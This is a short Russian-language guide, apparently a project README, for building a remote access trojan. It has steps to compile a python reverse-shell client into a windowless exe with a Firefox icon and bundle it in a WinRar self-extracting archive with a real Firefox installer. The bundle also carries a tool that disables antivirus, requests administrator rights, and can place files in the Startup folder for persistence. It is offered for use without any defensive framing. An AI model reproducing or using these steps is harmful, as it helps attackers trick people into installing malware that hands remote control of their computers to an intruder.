
Троян удалённого доступа, созданный с помощью WinRar со встроенным установщиком Firefox и python Reverse Shell.
Троян удалённого доступа, созданный с помощью WinRar с установщиком (например, firefox) и встроенной python Reverse Shell.
Отредактируйте файл client.py, указав IP-адрес и порт прослушивающего атакующего сервера, а также IP-адрес и порт любого прокси, присутствующего на атакующей машине. Если прокси нет, закомментируйте соответствующий раздел.
Преобразуйте client.py в exe, я использовал pyinstaller: pyinstaller -w -i "Firefox.ico" -F client.py. Опция -w позволяет создать .exe без окна, опция -F позволяет создать только один файл.
Создайте самораспаковывающийся ZIP-архив с помощью WinRar, выбрав три файла: безобидный установщик (например, «firefox installer.exe»), client.exe и antivirus.exe. В настройках самораспаковывающегося модуля задайте порядок выполнения файлов: сначала безобидный установщик, затем client.exe; установите флажок для извлечения файлов во временную папку или, если хотите действовать более злонамеренно, укажите папку для файлов, которые будут запускаться при загрузке системы (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). Также в настройках самораспаковывающегося модуля выберите запрос прав администратора. Файл antivirus.exe — это .exe без окна, который отключает антивирус. Он будет запущен client.exe перед подключением к серверу.
Файл antivirus.bat содержит код одноимённого .exe-файла и ещё одну дополнительную функцию. Я использовал «Slimm bat to exe.exe» для преобразования .bat-файла в .exe-файл без окна.
Приятного использования :)